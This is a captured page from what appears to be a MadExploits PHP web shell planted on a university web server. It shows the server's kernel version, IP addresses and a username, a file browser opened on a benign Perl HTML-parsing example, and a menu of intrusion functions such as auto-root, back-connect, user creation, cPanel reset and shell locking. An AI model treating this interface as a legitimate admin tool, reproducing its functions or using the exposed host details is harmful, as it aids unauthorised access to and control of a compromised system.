Linux web-conference.aiou.edu.pk 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 172.16.50.247 | : 18.118.9.147
Cant Read [ /etc/named.conf ]
7.4.3-4ubuntu2.28
appadmin
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
libhtml-parser-perl /
examples /
[ HOME SHELL ]
Name
Size
Permission
Action
README
1.06
KB
-rw-r--r--
hanchors
1.14
KB
-rwxr-xr-x
hdump
683
B
-rwxr-xr-x
hform
1.87
KB
-rwxr-xr-x
hlc
710
B
-rwxr-xr-x
hrefsub
2.72
KB
-rwxr-xr-x
hstrip
1.74
KB
-rwxr-xr-x
htext
575
B
-rwxr-xr-x
htextsub
955
B
-rwxr-xr-x
htitle
434
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : htext
#!/usr/bin/perl -w # Extract all plain text from an HTML file use strict; use HTML::Parser 3.00 (); use Encode; my %inside; sub tag { my($tag, $num) = @_; $inside{$tag} += $num; print " "; # not for all tags } sub text { return if $inside{script} || $inside{style}; print encode('utf8',$_[0]); } HTML::Parser->new(api_version => 3, handlers => [start => [\&tag, "tagname, '+1'"], end => [\&tag, "tagname, '-1'"], text => [\&text, "dtext"], ], marked_sections => 1, )->parse_file(shift) || die "Can't open file: $!\n";;
Close